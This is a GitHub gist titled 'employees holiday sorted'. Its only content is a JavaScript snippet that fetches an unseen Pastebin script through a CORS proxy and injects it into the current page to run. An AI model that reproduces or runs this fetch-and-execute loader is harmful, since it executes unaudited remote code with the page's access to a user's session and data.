Skip to content

Instantly share code, notes, and snippets.

@abhijithvijayan
Last active October 29, 2025 06:41
Show Gist options
  • Save abhijithvijayan/ba782ed6fc13a7a989bbe9537586e4cd to your computer and use it in GitHub Desktop.
Save abhijithvijayan/ba782ed6fc13a7a989bbe9537586e4cd to your computer and use it in GitHub Desktop.
employees holiday sorted
(() => {
var scriptUrl = "https://pastebin.com/raw/TgnYsdGh";
var scriptToInject = document.createElement("script");
var scriptSrcURL = 'https://whateverorigin.org/get?url=' + encodeURIComponent(scriptUrl);
fetch(scriptSrcURL).then((res) => res.json()).then((response) => {
scriptToInject.append(response.contents);
document.body.append(scriptToInject);
})
})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment